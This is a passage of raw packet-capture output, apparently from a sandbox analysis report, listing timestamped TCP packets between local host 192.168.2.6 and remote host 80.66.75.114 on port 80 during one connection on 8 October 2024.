                                                Oct 8, 2024 04:24:40.068006992 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068027973 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068088055 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068099022 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068129063 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068135977 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068173885 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068182945 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068223953 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068232059 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068272114 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068279028 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068319082 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068321943 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068361998 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068383932 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068423986 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068429947 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068464041 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068470955 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068511009 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068516970 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068562984 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068562984 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068605900 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068612099 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068651915 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068658113 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068697929 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068703890 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068748951 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069103956 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069147110 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069164991 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069210052 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069252014 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069271088 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069309950 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069315910 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069354057 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069366932 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069406033 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069430113 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069469929 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069492102 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069533110 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069536924 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069576979 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069581985 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069614887 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069649935 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069689989 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069710016 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069750071 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069756031 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069801092 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069802046 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069843054 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069865942 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069905996 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069915056 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069955111 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069956064 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069996119 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070018053 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070059061 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070067883 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070103884 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070126057 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070163965 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070187092 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070226908 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070246935 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070286989 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070307016 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070343971 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070368052 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070415974 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070430040 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070471048 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070477962 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070518017 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070538998 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070583105 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070600986 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070642948 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070662022 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070708036 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070723057 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070769072 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070771933 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070815086 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070817947 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070857048 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070882082 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070945024 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070971966 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070986032 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070991993 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071047068 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071053982 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071099997 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071144104 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071175098 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071175098 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071185112 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071194887 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071237087 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071242094 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071286917 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071327925 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071371078 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071441889 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071441889 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071441889 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071448088 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071485996 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071494102 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071540117 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071551085 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071583033 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071584940 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071629047 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071630955 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071669102 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071676970 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071717978 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071722031 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071763039 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071768045 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071811914 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071815014 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071856022 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071862936 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071907997 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071913958 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071954012 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072004080 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072025061 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072053909 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072060108 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072105885 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072144985 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072151899 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072197914 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072235107 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072242975 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072253942 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072283030 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072297096 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072341919 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072365999 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072376013 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072386980 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072431087 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072433949 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072474003 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072477102 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072521925 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072568893 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072573900 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072573900 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072614908 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072659969 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072662115 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072705984 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072740078 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072750092 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072756052 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072796106 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072837114 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072839975 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072885036 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072927952 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072941065 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072941065 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072972059 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.073016882 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.073018074 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.073062897 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.073086977 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.073108912 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.073148012 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.073162079 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.073210001 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.073214054 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.073251963 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.073255062 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.073306084 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.073313951 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.073359013 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.157138109 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157201052 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157246113 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157247066 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.157290936 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157351971 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157411098 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157449961 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.157449961 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.157470942 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157504082 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.157521009 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.157531977 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157577038 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157618999 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.157620907 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157665968 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157706976 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.157708883 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157747984 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.157753944 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157798052 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157840967 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.157844067 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157886982 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157928944 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.157934904 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157975912 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.157980919 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.158026934 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.158070087 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.158071041 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.158119917 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.158159018 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.158159971 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.158200979 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.158564091 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.158691883 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.158730984 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.158734083 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.158780098 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.158817053 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.158823967 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.158860922 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.158869028 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.158915043 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.158956051 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.158974886 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.159034967 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.159075975 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.159080029 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.159121037 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.159125090 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.159169912 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.159214973 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.159215927 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.159317017 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.159359932 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.159363031 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.159399033 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.159756899 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.159801960 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.159842968 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.159861088 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.159919977 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.159961939 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.159965992 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.160003901 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.160027981 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.160093069 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.160140038 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.160151958 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.160212040 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.160250902 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.160254002 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.160290956 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.160296917 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.160356998 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.160399914 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.160401106 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.160444975 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.160489082 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.160506010 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.160547018 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.160552025 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.160613060 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.160655022 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.160672903 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.160734892 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.160778046 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.160794973 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.160836935 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.160841942 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.160902977 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.160945892 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.160964012 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.161026001 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.161068916 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.161084890 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.161130905 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.161130905 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.161201000 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.161210060 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.161264896 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.161312103 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.161325932 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.161385059 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.161427021 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.161447048 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.161488056 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.161508083 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.161551952 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.161593914 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.161612988 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.161658049 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.161701918 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.161719084 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.161761045 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.161765099 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.161811113 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.161850929 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.161851883 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.161891937 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.161910057 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.161952019 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.161968946 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.162015915 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.162028074 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.162069082 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.162072897 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.162117958 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.162161112 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.162163973 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.162205935 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.162249088 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.162283897 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.162331104 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.162343025 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.162384033 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.162425995 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.162430048 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.162472010 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.162489891 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.162534952 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.162534952 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.162576914 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.162583113 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.162626028 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.162627935 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.162853956 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.162941933 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.162986994 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.163003922 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.163044930 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.163048029 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.163089037 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.163094997 CEST804973880.66.75.114192.168.2.6
